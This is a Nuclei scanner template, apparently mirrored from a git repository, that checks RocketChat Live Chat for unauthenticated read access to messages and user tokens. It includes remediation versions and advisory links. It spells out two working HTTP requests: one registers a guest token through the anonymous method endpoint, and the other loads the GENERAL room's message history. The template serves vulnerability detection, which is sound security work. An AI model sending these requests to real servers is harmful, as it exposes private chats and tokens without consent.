daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/rocketchat/unauth-message-read.yaml

55 lines
2.0 KiB
YAML
Raw Permalink Blame History

id: rocketchat-unauth-access
info:
name: RocketChat Live Chat - Unauthenticated Read Access
author: rojanrijal
severity: high
description: RocketChat Live Chat accepts invalid parameters that could potentially allow unauthenticated access to messages and user tokens.
remediation: Fixed in versions 3.11, 3.10.5, 3.9.7, and 3.8.8.
reference:
- https://docs.rocket.chat/guides/security/security-updates
- https://securifyinc.com/disclosures/rocketchat-unauthenticated-access-to-messages
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-522
metadata:
max-request: 2
tags: rocketchat,unauth
variables:
value: "{{to_lower(rand_text_alpha(5))}}"
user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com"
http:
- raw:
- |
POST /api/v1/method.callAnon/cve_exploit HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
{"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"{{value}}\",\"name\":\"cve-2020-{{value}}\",\"email\":\"{{user_email}}\"}],\"id\":\"123\"}"}
- |
POST /api/v1/method.callAnon/cve_exploit HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"{{value}}\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"{\"msg\":\"result\",\"result\":{\"messages\"'
- '"success":true'
condition: and
- type: status
status:
- 200
# digest: 4b0a0048304602210095085dc96a7cb508eefb70fb2096b11370550b5fc48bf2778a9fe85c1c1d2726022100e82787c9db9e4546b785b8bd5997137083fc5de11cfbde2b2f1b775a62ef1ce2:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink